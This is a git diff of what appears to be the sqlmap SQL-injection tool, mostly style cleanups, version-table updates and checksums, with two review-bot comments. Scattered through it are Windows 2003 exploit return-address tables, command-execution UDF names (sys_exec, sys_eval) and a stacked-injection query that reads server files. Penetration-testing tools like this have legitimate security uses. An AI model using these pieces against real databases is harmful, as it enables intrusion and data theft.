"CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 05/2009 - "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", 
"CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + # 2003 Service Pack 2 updated at 05/2009 + "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + + # 2003 Service Pack 2 updated at 09/2009 + # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), + } - # 2003 Service Pack 2 updated at 09/2009 - #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), - } addrs = None for versionSp, data in returns.items(): diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 276c67663a6..b91bbefca74 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py 
@@ -23,11 +23,11 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take
 def __init__(self):
 self.excludeDbsList = MYSQL_SYSTEM_DBS
 self.sysUdfs = {
- # UDF name: UDF return data-type
- "sys_exec": { "return": "int" },
- "sys_eval": { "return": "string" },
- "sys_bineval": { "return": "int" }
- }
+ # UDF name: UDF return data-type
+ "sys_exec": {"return": "int"},
+ "sys_eval": {"return": "string"},
+ "sys_bineval": {"return": "int"}
+ }
 Syntax.__init__(self)
 Fingerprint.__init__(self)
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index 9a0ec75e67f..2e039532e27 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -41,18 +41,19 @@ def _commentCheck(self):
 # Reference: https://downloads.mysql.com/archives/community/
 versions = (
- (32200, 32235), # MySQL 3.22
- (32300, 32359), # MySQL 3.23
- (40000, 40032), # MySQL 4.0
- (40100, 40131), # MySQL 4.1
- (50000, 50096), # MySQL 5.0
- (50100, 50172), # MySQL 5.1
- (50400, 50404), # MySQL 5.4
- (50500, 50554), # MySQL 5.5
- (50600, 50635), # MySQL 5.6
- (50700, 50717), # MySQL 5.7
- (60000, 60014), # MySQL 6.0
- )
+ (32200, 32235), # MySQL 3.22
+ (32300, 32359), # MySQL 3.23
+ (40000, 40032), # MySQL 4.0
+ (40100, 40131), # MySQL 4.1
+ (50000, 50096), # MySQL 5.0
+ (50100, 50172), # MySQL 5.1
+ (50400, 50404), # MySQL 5.4
+ (50500, 50558), # MySQL 5.5
+ (50600, 50638), # MySQL 5.6
+ (50700, 50720), # MySQL 5.7
+ (60000, 60014), # MySQL 6.0
+ (80000, 80003), # MySQL 8.0
+ )
 index = -1
 for i in xrange(len(versions)):
diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index 4a5173b5241..19207ba3e7c 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
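Review bot: The `versions` table in `_commentCheck()` gets new upper bounds for 5.5, 5.6 and 5.7 and a new 8.0 row, but nothing records when the table was last refreshed, so the next reader cannot tell whether an upper bound is a real last release or simply stale; the Access fingerprint touched in this same commit does carry `# Microsoft Access table reference updated on 01/2010` for exactly this reason. Suggest extending the existing reference comment to `# Reference: https://downloads.mysql.com/archives/community/ (table last updated <date of this change>)`, filled in with the actual date. `_commentCheck()` begins and ends outside the hunk.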
@@ -67,10 +67,10 @@ def udfSetRemotePath(self):
 # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
 # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
 else:
- #logger.debug("retrieving MySQL data directory absolute path")
+ # logger.debug("retrieving MySQL data directory absolute path")
 # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir
- #self.__datadir = inject.getValue("SELECT @@datadir")
+ # self.__datadir = inject.getValue("SELECT @@datadir")
 # NOTE: specifying the relative path as './udf.dll'
 # saves in @@datadir on both MySQL 4.1 and MySQL 5.0
diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py
index bc24a57c2f8..41683881fda 100644
--- a/plugins/dbms/postgresql/__init__.py
+++ b/plugins/dbms/postgresql/__init__.py
@@ -23,12 +23,12 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous,
 def __init__(self):
 self.excludeDbsList = PGSQL_SYSTEM_DBS
 self.sysUdfs = {
- # UDF name: UDF parameters' input data-type and return data-type
- "sys_exec": { "input": ["text"], "return": "int4" },
- "sys_eval": { "input": ["text"], "return": "text" },
- "sys_bineval": { "input": ["text"], "return": "int4" },
- "sys_fileread": { "input": ["text"], "return": "text" }
- }
+ # UDF name: UDF parameters' input data-type and return data-type
+ "sys_exec": {"input": ["text"], "return": "int4"},
+ "sys_eval": {"input": ["text"], "return": "text"},
+ "sys_bineval": {"input": ["text"], "return": "int4"},
+ "sys_fileread": {"input": ["text"], "return": "text"}
+ }
 Syntax.__init__(self)
 Fingerprint.__init__(self)
diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py
index 13129c9e2d7..3ba144511f5 100644
--- a/plugins/dbms/postgresql/syntax.py
+++ b/plugins/dbms/postgresql/syntax.py
@@ -22,6 +22,6 @@ def escape(expression, quote=True): """ def escaper(value): - return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) + return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 2b5f2d6f3a7..2432598b75c 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -176,7 +176,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 02fce6b7af5..75a9c704c58 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -400,7 +400,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -663,8 +663,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod query += condQuery elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.count % (conf.db, conf.db, \ - unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): 
@@ -763,8 +762,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, - conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column) elif Backend.isDbms(DBMS.INFORMIX): @@ -823,10 +821,7 @@ def getSchema(self): self.getTables() infoMsg = "fetched tables: " - infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ - Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \ - else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \ - kb.data.cachedTables.items()]) + infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()]) logger.info(infoMsg) for db, tables in kb.data.cachedTables.items(): diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 0fab15af1ec..c0a94627471 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -470,7 +470,7 @@ def dumpAll(self): if kb.data.cachedTables: if isinstance(kb.data.cachedTables, list): - kb.data.cachedTables = { None: kb.data.cachedTables } + kb.data.cachedTables = {None: kb.data.cachedTables} for db, tables in kb.data.cachedTables.items(): conf.db = db 
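Review bot: In the `getSchema` hunk the joined one-liner renames the inner comprehension variable from `t` to `_`, which by Python convention marks a discarded value, while here it carries the table name handed to `unsafeSQLIdentificatorNaming(_)`; keeping `t` (or `tbl`) preserves the original's readability, e.g. `... unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in kb.data.cachedTables.items()])`. The same hunk folds a four-line expression into a single line of well over 200 characters, which is harder to review than the wrapped form it replaces. getSchema's body continues outside the hunk.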
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index a57548c79cd..59ca3284ef3 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -49,7 +49,7 @@ def _checkFileLength(self, localFile, remoteFile, fileRead=False): elif Backend.isDbms(DBMS.MSSQL): self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") - inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); + inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) diff --git a/tamper/between.py b/tamper/between.py index 57edd5151de..e64628f127f 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -55,5 +55,4 @@ def tamper(payload, **kwargs): _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) retVal = retVal.replace(match.group(0), _) - return retVal diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py index 5ac14a559a0..b049d858271 100644 --- a/tamper/ifnull2casewhenisnull.py +++ b/tamper/ifnull2casewhenisnull.py @@ -61,5 +61,3 @@ def tamper(payload, **kwargs): break return payload - - diff --git a/txt/checksum.md5 b/txt/checksum.md5 index dcb2f4f475c..e2a2c59e146 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -21,35 +21,35 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py -9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py -a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py +62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py +a66044daa98684fde830324c54da98ee lib/controller/controller.py +c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -052c368ae6ca09362a19376c8483fa85 lib/core/agent.py -591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py +b1990c7805943f0c973a853bba981d96 lib/core/agent.py +fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py -2910524e4478be6b5893fb9d851a62ec lib/core/convert.py +1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py -9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py -a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py +fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py +da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py -c8551f7696a76450e6d139409e4f06cd lib/core/enums.py +bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -8a9346b975931d8d995354692ab68f82 lib/core/option.py -7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py +c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 
+911ec851f2cad046036ddaf776c8559f lib/core/option.py +7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -053e81e44a3df054a3ffd39d58de7079 lib/core/settings.py -d0adc28a38e43a787df4471f7f027413 lib/core/shell.py -63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py -3cc852f927833895361973fbcfd156d2 lib/core/target.py +36989c9805e448024fc49aabde49a69e lib/core/settings.py +0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py +a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py +12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py 
@@ -57,122 +57,122 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -d505c725f5d6887ec80b5b94ca1dc9f5 lib/parse/cmdline.py +f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py +8d7321a1bc1a26ac55b2398bf445d78f lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py +53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -94c0ce8d2a2d9001a416420f61b67ee7 lib/request/connect.py +b91eaa32c602182c4f6e2f7d6de61267 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py -a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py +eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -bee0a8bec4968406e93281d2b8ad62c8 lib/request/inject.py +cb05d965aa3d5871d14b5e45fe9128b4 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py -bbfe91128ab3ad65343ed449936a890b lib/request/templates.py -edfd88ee82c2b2a0a762dad1f4eb5253 lib/takeover/abstraction.py +7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py +8d31425f36a7a9c093eb9bef44589593 
lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py -0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py +b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py +fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -746f400dfa6dc1139f14c44574d6b948 lib/takeover/web.py -d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py -b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py +4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py +79d1ba3ab7b2552c5f09992ce08e765d lib/takeover/xp_cmdshell.py +2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py 733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py +f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py -ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py -609ba6e5039de4814115b966cd72645a lib/utils/api.py +11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py +c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py -a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py -69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py -a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py +31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py +de9620f03231d8329ee8434884b6bacd lib/utils/deps.py 
+635ed692ab141d428d0957b71b25c1aa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py -145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py +cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py +011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py -5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py +5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py -1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py +3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py +7348ee704485651737ddbe3538271be9 lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -47a9c7a39ad179b73a9d6f0e1f269f74 plugins/dbms/access/fingerprint.py +c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -0cf941076f4685ec8ac63f57b31a46a6 plugins/dbms/db2/connector.py +ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py 0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -a660e74854f3c70606f1cc3bc450fbcc plugins/dbms/db2/fingerprint.py +ba492b2aaa6432b5548c5a8fa5eec435 plugins/dbms/db2/fingerprint.py 
95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -4a941e7f39dc098ee489eeacc720a8cc plugins/dbms/firebird/connector.py +53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -94a86678fd2bf6bff6c3439934f59277 plugins/dbms/firebird/fingerprint.py +bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py +271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -5fca2136204e0ea432cc7a2572244a20 plugins/dbms/informix/connector.py +9ceb9430031a26ecebe13ea49cb2a5fa plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py 35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py 9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py -39dc5c088b4d37742290acc76c47fe94 plugins/dbms/informix/syntax.py +aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 
plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -615be11d750530211af244b6ca6aef14 plugins/dbms/maxdb/enumeration.py +f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py -a833fbc30ab1133bc6ba293d97d0ef7c plugins/dbms/mssqlserver/enumeration.py -7e495d786fa8e1da96e73e2905bbd7dd plugins/dbms/mssqlserver/filesystem.py -03d463c15ebbfa4e49155b261b59db31 plugins/dbms/mssqlserver/fingerprint.py +f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py +177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py +51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -b9e62a80bd3ead133a511f9769e5e6c3 plugins/dbms/mssqlserver/takeover.py +08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py -2bfd2369aebe2999f7333cca0895507c plugins/dbms/mysql/fingerprint.py -88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py +fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py +30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py -f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py +403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py 
